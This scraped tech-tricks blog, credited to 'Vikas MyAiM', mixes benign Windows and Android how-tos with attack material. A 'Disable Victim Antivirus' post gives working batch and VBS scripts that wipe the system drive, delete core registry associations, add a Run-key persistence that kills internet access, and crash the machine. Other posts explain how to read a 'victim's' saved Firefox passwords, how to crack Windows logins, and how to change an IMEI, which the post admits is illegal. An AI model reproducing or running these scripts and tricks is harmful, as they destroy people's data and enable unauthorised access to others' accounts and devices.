easlily. just get a Small Puppy linux CD or any other heavyweight Linux CD. By:- Vikas MyAiM

Change Processor Name Permanently

Steps:-1. Open Notepad......2.Copy and paste the exact codegiven below:-Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]“ProcessorNameString”=“My Processorname 50000MHz”To change the processor name, editthe part of the code given in blue. Also understand that\0in the above code should only be present if Windows store your processor name at that location. Please open Registry Editor and navigate to the above mentioned keysto check whether or not to include the\0....3. Click on File Menu, click on SaveAs and select“All Types”in Save asType option. Save the file asProcessorNameChange.reg or*.reg...4. Create a new shortcut on your desktop.Enter regedit / S “Locationof the.reg file”as the location of theitem. For example,enter regedit /S “C:\Processor Name.reg”if your registry file is located in the root of C:\ drive.Processor Name.....5.Copy the created Shortcut file.....6. Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) or to C:\Users\ User-Name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista. Also remember thatAppData is a hidden folder.) if C: is your System drive.......7.Paste the copied file.This registry file would now execute each time when Windows starts and the Processor Name String would be modified each time. So, even upon restarting your computer, you will see that the changed processor name is permanent. By:- Vikas MyAiM


20150909012334.jpg "CHANGE YOUR IP ADDRESS IN LESS THAN IN 1 MINUTE" •Click on "Start" in thebottom left corner of the screen. •Click on"RUN" •Type in "command" and click OK You should be now at MSDOS prompt Screen •Type "ipconfig /release" just like that, and press "enter" •Type "exit" and leave the prompt •Right-click on "Network Places" or "My Network Places" on your desktop. •Click on "properties" Now you should be on a screen with something titled "Local Area Connection", or something similar to that, and, if you have a network hooked up, all of your other networks. • Right click on "Local Area Connection" and click "properties" •Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab •Click on "Use the following IP address" under the "General" tab •Create an IP address (It doesn't matter what it is) •Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers. •Press the "Ok" button here •Hit the "Ok" button again Now you should be back to the "Local Area Connection" screen. •Right-click back on"Local Area Connection" and go to properties again. •Go back to the "TCP/IP" settings •This time, select "Obtain an IP address automatically" •Click on "Ok" •Hit"Ok" again. •Now you have a New IP address.
Trick By:→ѷї₭@∽ MyAiM

How to Change the Folder Colour In Windows

wap-master-2.jpgAre you Bored to see the default YELLOW ... color folder in your computer and Are you confused to get to the right folder within the hundreds of folders with same color then this tool will help you... changing the folder color will definitely help you to get the right folder without just depending on the folder name...... Installing the Colorizer : You can get the colorizer from Here http:// ... After downloading the software from the link provided run it and accept the User License Agreement during installation you may require the Dot Net FrameWork 3.0 to continue the installation you can get this from Microsoft Download Link http:// m/download/en/ confirmation.asp x?displayLang=e n&id=17851 After Successfully installing the software on your computer you can see the see the Colorizer option when you"right click" on any folder....Once you right click on any folder and select the"Colorizer" option you will promoted to select the color for your folder...and you can even make the custom colors for yourfolder.....You can revert to default color at any time.. This software supports all 32bit and 64bit computers....

How to hide your PC from the network

How to hide your PC from the network++++++++++++++++++++++++++ ++ This is a tutorial on how to hide your machine from the network. Go to Run --> cmd After that type the following command, as the snapshot shows: net config server /hidden:yes Press Enter. Reboot your machine and wait for a while. If you want it back to be not hidden, write: net config server /hidden:no * Then reboot your machine and wait for a while...!!

How To Disable Victim Antivirus [exclusive tutorial]

20150908201041.jpg IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept . All Scripts Here Are To Be Copied In Note Pad >>This Virus Deletes All The Content Of A Drive... @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Save The Above Code a .bat file>> Disable Internet Permanently Save As A bat File echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE>> The Most Simple Virus To Crush The Window @Echo off Del C:\ . |y Save It As Anything.bat>> This Will Crash Ur Computer Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject("Wscript.Shell") Dim x For x = 1 to 100000000 WSHShell.Run "Tourstart.exe" Next It Only Works With Windows XP >>Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK] This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)* Code:- @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your computer has been fcked. Have a nice day. GOTO MESSAGE >>Endless Notepads This will pop up endless notepads until the computer freezes and crashes Trick By: - Vikas MyAiM ONCE AGAIN M SAYING U THAT USE IT YOUR OWN RIS........ M NOT RESPONSIBLE FOR ANY PROBLEM, BE CAREFUL MOST DANGEROUS

Repair Your Window Without Use Cd

p-c-2.jpg1. Click on START BUTTON and then RUN Type webfldrs.msi(without quote) 2. This will start the process to repair yourwindow's problems. Follow the instructions. 3. In next screen, choose SELECT REINSTALL MODE. 4. A new window will appear. Put check marks on all the options and click OK. 5. This will take few minutes so you can take rest 6. When the process will complete, it will ask for RESTART your pc. By:- Vikas MyAiM

Monday, 7 September 2015

How To Use Mobile Camera As A WebCam

20150907215456.jpg Today I am going to tell you How To Use Mobile Camera As A WebCam Step1:- Install Windows [EXE] (SmartCam.exe on your PC and Install) Step2:- Install Smartcam on your Mobile (Symbian S60 2nd Edition [SIS], S60 2nd Edition, JME [JAR], Windows Mobile [CAB], Android [APK] Step3:- Start up SmartCam on your PC and go to >>> File >>> Settings and check your connection and proceed >>> next step. Step4:- Start SmartCam on your phone and go to >>> Options >>> Connect and it will ask you for server name and you need to type your PC IP address or your system name if YOU don't know your IP address then,>>> go to RUN >>> type CMD >>> typeipconfig" OrR">>> go to Google>>> type "my ip address"

Hack Windows 7 Password Using Ophcrack

20150907213734.jpgOpcrack is an open sourcewindows password cracker based on rainbowtables. It comes with Graphicaluser interface (GUI) and runs on multiple platform such windows, linux and mac. It allows you to recover or hack windows password. Step: - 1>Download OPhcrack by this link 2>Make Bootable Pendrive/CD 3>Boot System with this Pendrive or CD 4> All Done ...Your Password'll Appear !!!Enjoy__ BY:- Vikas

How To Hide All Text Files in Notepad?

Today I am going to share a cool notepad yet new & useful trick. This trick is used when you want to hide all your text files in notepad. Here is the guide: Just follow the below steps to hide text files in notepad file: 1. First of all, Open "Run" program and by pressing "WIN+R" or by going to start menu. 2. Type "cmd" in search bar of start menu to open command prompt. 3. Type command "cd desktop" in command prompt. 4. Then type command "file name.txt:hidden" in command pompt. 5. Then Notepad file will open with dialouge and press "Yes" in dialouge box. 6. Then type all your data in notepad and press CTRL+S to save or save your file by going over to "file" menu. 7. Now try to open that file and you can see that there is no data in that file and if you want to retrive all the data then follow the below steps: RETRIVING DATA: 8. Open command prompt and type "cd desktop". 9. Type "file name.txt:hidden". 10. Now you can see all the data that you had typed in notepad file. вy:-ⅴīкคร ๓yคī๓

Sunday, 6 September 2015

Lock Your Computer With pattern lock like Android phone

20150906224702.jpgFeatures : Automatically Lock on Startup.Wrong password will alert you with siren sound.*You can set message as per your choice on Lock screen.*You can set background image as per your choice. Steps To Use : *Firstly Download this application by clicking on this Link Click Here *Now you can Eusing Maze Lock pattern window where we have to save some settings. Here you can set lot of things like Reset, backup & pattern style points. Set pattern as per your choice by dragging your mouse and if you want to take backup of your pattern then select " Backup Pattern". Backup pattern will be save in BMP format so that if you forget your pattern then you can easily check it. Finally click on General tab and change the Auto lock in windows startup to ON. You can write your custom message in message box below settings which you will be able to see in lock screen. Finally Click OK and its Done !! BY:-Vikas MyAiM

How To Hack Saved Password In Firefox ?

20150906210201.jpg In this post i will share with you guys how to view saved password in Mozilla Firefox web browser. This trick can be helpfull if you get your hands on someone computer maybe your friends and he has saved password for certain websites like gmail, facebook,yahoo etc then you can easily view his password with very simple and easy trick that i am going to share today...... For demonstration purpose i have already saved a fake email password for facebook.But it will work on any website. So lets get started. How to do ? 1. Open Firefox Web Broweser 2. Then Click on FireFox>Option>Optionas shown in below picture 20150906210227.jpg 3. Then a POP Up box will appear, In that go to security and click on Show Passwords as show below. 20150906210230.jpg 4. Now click on website whose password you want to see ans click on show password as shown in below image. (Note: It will ask for confirmation so click on yes when dialog box appears) 20150906210233.jpg 5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password. 20150906210237.jpg
Trick By:→ѷї₭@∽ MyAiM

Friday, 4 September 2015

How to use your Android phone as a scanner

The latest update of Google Drive comes with a great new feature -an inbuilt scanner. Its not like storing a regular photo of the document, the app actually converts the picture of the document into a PDF that is automatically stored to your Google Drive (see example in the screenshot.) The file is also searchable in your drive as the text in your document will also be made searchable. Follow the steps below to do this on your Android phone: 1. Ensure that you have the latest version of Google Drive on your phone. (You can check on the play store if updates are available) 2. Open Drive and click on the three vertical dots in the right hand corner of your screen. 3. Click on 'Add new.' 4. Choose 'Scan.' 5. The camera will now open and you should click a photo of your document. Please ensure that the document is kept on a flat surface like a table. 6. Once the photo is clicked watch drive convert it into a PDF automatically. 20150904215832.pngCongratulations, you just saved money that you would have otherwise spent on buying a scanner. BY:-Vikas MyAiM


As we all know in android smart phones some times unfortunately we are phase un wanted problems such as hang problem, slow working problem,and much more then we have only a chance of restore the phone to avoid these problems. but by restoring the phones our all important data has to be deleted so we need to backup all the important data of our phone and then we are restore the phones settings. so guys i am going to tell you the whole procedure of back up your android phone data. there are two ways of backup your phone data. 1) using google account. 2) using samsung kies. ………………………………FOLLOW THE STEPS GIVEN BELOW TO BACKUP YOUR PHONE'S DATA USING GOOGLE ACCOUNT…………………………………… • if you don't have Google account then you can backup your data using samsung kies the procedure is given below in next para. BACKUP YOUR DATA USING GOOGLE ACCOUNT 1. go to setting of your android phone. 20150904212000.jpg 2. click on account & sync tab. 20150904212007.jpg 3. And from here add your google account. 4. And then tap on status bar and click on sync button. 20150904212013.png 5. Now your all contacts,photos,videos,memos, will synchronize with google account. 6. and after restore you can add google account as same as tell you above and click sync. button. 7. now all your important data will be back in your phone. ……………………•BACK UP YOUR DATA USING SAMSUNG KIES…………………• 1. download samsung kies in your pc from here SAMSUNG KIES 2. connect your phone to the pc using usbcable. 3. open kies software in your pc. 20150904212024.png 4. click on back up/restore tab as shown in picture below. 20150904212029.jpg 5. select what you want to backup and click on backup. 6. and in several minutes your backup will be done. By:-Vikas MyAiM

How to lock any website on your Android phone

welcome-to-you-my-blog.jpg You Can Block Any WebSite On Your Android Phone For People Not To Access The WebSite....Follow These Process..:Go And Download HOSTS EDITOR From Google PlayStore.After You Have Download It, Then Install It And Start The Application.Then Select new entry From The Menu.Type 127.0.01 In The IP Address Box In The Host Entries.Then Select Put The Web Address You Wish To Block (e.g And Then Click save new host To Save The File.Then Whenever You Or Anybody Try To Enter The WebSite On Your Phone,It Will Not Go.If You Want To Block Another Web Site, Then Change 127.0.01 To 127.0.02 And You Will Be Changing The Last Number For Each WebSite. By:- Vikas MyAiM


Trick By:→ѷї₭@∽ MyAiM
1. USB Debugging enable on android device. 2. Android Data Recovery software.Steps to Recover Deleted Photos From Android 1. First of all you need to download and install a software Android Data Recovery 2. Now install this software in your computer. 3. Now enable USB debugging of your android. a) For Android 2.3 or earlier: Enter “Settings” > Click “ Applications” > Click “Development ” > Check “ USB debugging”f8fcfc b) For Android 3.0 to 4.1: Enter “Settings ”> Click “Developer options ” > Check “USB debugging” c) For Android 4.2 or newer: Enter “Settings ” > Click “About Phone” > Tap “Build number” for several times until getting a note “You are under developer mode” < Back to “Settings” > Click “Developer options” > Check “ USB debugging”. 4. Now connect your android device to your computer with your USB Cable. Please make sure that your mobile should be charged upto 30%........5. Now scan your device in the Android Data Recovery software.Now you will see your device connected in the Android Data Recovery software.......6. Now you can scan your device for the lost photos, it can take a while ............7. Now the software will display all the list of images that have been deleted from your android..........8. Now select the photos you want to recover on your android and click on recover button........9. Now your photos will get recovered and saved in your computer.About Android Data Recovery Software..... 1. This is the World’s first Data Recovery Software for Android Smartphones.......2. It Directly retrieve deleted SMS text messages and contacts from your android device.......3. Recover pictures and video lost due to deleting, restoring factory settings, flashing ROM, rooting, etc., from SD cards inside Android devices.... 4. This software Supports multiple Android phones and tablets, like Samsung, HTC, LG, Motorola, and many more. Visit Daily, hapy to help u

How to Trace Mobile Number with Name

1. First of all visit the official site of TrueCaller = 2. Select your country from the drop down menu 3. Now enter the mobile number to trace it’s user name Select Your Country From Drop Down Menu – Trace Mobile Number With Name 4. You can see the search button there, just click on it. And then you are required to sign on via Facebook, Google+,Linkedin, Twitter and Yahoo. Sign in – TrueCaller After completing above steps,now you can see the name of mobile owner with other information.Mobile Owner’s Information: Mobile Number Trace There is the limitation on TrueCaller that it does not provide information of every mobile number.So you should also try their alternatives available in the internet for mobile number trace. visit daily By:- Vikas MyAiM

How To Get Memory Card Password Of Any Phone

hacker-myaim-blue.jpg This Trick Is Very Important For Us........ Some Times We Forgot Our Memory Password And We Have Not Success To Open Sd On Mobile...... Now You Can Find Password With Your Own Android Phone.... Follow These Simple Steps :-1- First Of All Download Ex-Plorer And Open It...... 2- After Open Press 0 and check which you have marked the "show the system files" 3- Once you done that now go to the following path C:/Sys/Data/ Mmcstore. 4- Once you reached there you need to press "3" under option to set it in the Hex-viewer 5- See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2? 6?2?6). Just check the character between the "?" it is your password ie: 62626 Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data
Trick By:→ѷї₭@∽ MyAiM

How To Change imei In Any Android

android-mobile.jpgAndroid Users, I am Back With a Awesometrick for Change Imei In Any Android With Xposed Module.........With This Module You Can Change Your Android Phone Imei Without Any Problems...With This Method you can change imei In non MTK Phones too.... So Follow My Easy Guide and you can change Imei of your android device.....For Change Imei In Android Follow These Steps - At First Install Xposed Framework After Install Open Xposed Framework Module And Click On Framework And ClickOn Install Give Root Permissions To App And Reboot Your Device After Reboot Download Imei Changer Module from After Install Imei Changer Open Xposed Framework And Enable Imei Changer Module Then Reboot Your DeviceOnce Again After Reboot Device Open ImeiChanger And Enter Imei Which You Want And click on Save And Turn Airplane Mode On/Off And then Check Your Imei Will Be Changed Like Magic Check Imei From Dialer - *#06# Note -This Is For Educational Purpose Only, ImeiIs Illegal to Change And Don't be oversmart ..i am not responsible for any thing happens with You...
By:→ѷї₭@∽ MyAiM

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How to copy (steal) files from a computer to a pendrive (Latest VIRUS)

Hello guys,have u ever want something from your friend pc,that he is not giving you like games,movies,important files etc. here icome...